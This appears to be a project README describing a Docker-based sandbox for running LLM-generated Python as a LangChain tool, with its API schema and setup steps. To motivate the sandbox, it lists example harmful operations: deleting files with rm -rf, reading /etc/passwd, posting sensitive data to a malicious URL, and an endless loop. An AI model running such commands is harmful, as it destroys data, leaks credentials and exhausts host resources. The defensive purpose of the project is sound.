We demonstrate how to construct a docker based Python code interpreter that can be used as a Langchain Agent Tool for controlled and secure execution of LLM generated Python code.
Langchain's experimental hub contains the PythonREPLTool
tool which can be used to locally execute LLM-generated Python code. However, when using this tool, we face potential security risks from arbitrary code execution since the LLM could potentially generate harmful code such as
# Potentially harmful operations
os.system('rm -rf *') # Delete files
open('/etc/passwd').read() # Access sensitive files
requests.post('malicious-url', data=sensitive_data) # Data exfiltration
while True: pass # Resource exhaustion
and hence is it unsafe to run any LLM generated code directly on the host machine without a suitable sandboxing mechanism.
Cohere-Terrarium is a very interesting solution that provides a sandboxed environment for running LLM generated Python code. Based on the Pyodide project, it allows running Python code to be run locally or in the cloud within the WASM interpreter. However, the primary limitation of this approach is that it is restricted to Pyodide-compatible packages. If the LLM generates code that requires a package which is not compatible with Pyodide, the code cannot be executed. (Note that Pyodide contains micropip, so in theory one could potentially let the python app code to first use micropip to install the missing package, but there are several challenges here; for example; the LLM needs to be carefully prompted to Pyrodide-compatible packages and installation of missing packages; I did some preliminary investigation on this and found this challenging.)
Instead of trying to secure Python first with WASM, and then with Docker like Cohere Terrarium does, the solution here is just to protect the Python environment with Docker. This way, even if the LLM generates malicious code, it can only "break" the container, not our system.
Here's how it works:
/workspace
directory within the container.The Docker sandbox uses a simple but effective API schema:
Input:
{
'code': str # Python code to execute
}
The code string is sent to the Flask server running in the Docker container. The output schema from the Flask server is as follows:
Output:
{
'success': bool, # Execution status
'output': str, # stdout/stderr content
'error': Optional[str], # Error message if any
'files': Optional[Dict[str, bytes]] # Base64 encoded files
}
The client.py file contains the code to parse the Flask server's response and return the code execution result back to the LangChain agent.
The sandbox is exposed to LangChain as a Tool:
Tool(
name="python_code_interpreter",
func=run_python_code,
description="""A Python shell. Use this to execute python commands.
Input should be a valid python command.
If you want to see the output of a value, you should print it out with `print(...)`.
Always save files to '/workspace/' directory."""
)
Process Isolation:
File System Safety:
/workspace
directoryNetwork Control:
Package Management:
RUN pip install numpy pandas matplotlib seaborn scikit-learn
Error Handling Simplicity: When it comes to error handling, simpler is better! Initially, I tried to be clever with custom error messages and complex error handling, but then we found that:
agent_executor = AgentExecutor(
agent=agent,
tools=tools,
verbose=True,
handle_parsing_errors=True # This is the magic!
)
Just setting handle_parsing_errors=True
and letting the raw stderr flow back to the LLM works amazingly well. Why? Because:
LLM Behavior Insights:
/etc
without trying)Sandbox Design Decisions: One of the trickiest parts of our Docker sandbox was figuring out how to get files in and out without mounting volumes (which could be a security risk). The solution used here is follows:
Install dependencies:
pip install -r requirements.txt
Build and run Docker container:
cd python/tools/docker_python_sandbox
docker build -t python-sandbox .
docker run -p 5000:5000 python-sandbox
Set up environment variables:
export OPENAI_API_KEY=your_api_key
Run the application:
python python/main.py
This project is licensed under the Apache License, Version 2.0 (APL 2.0).
No security solution is perfect. The code in this repo is provided as-is and without any guarantees. Always:
This repo was created by Prakash Narayana Moorthy.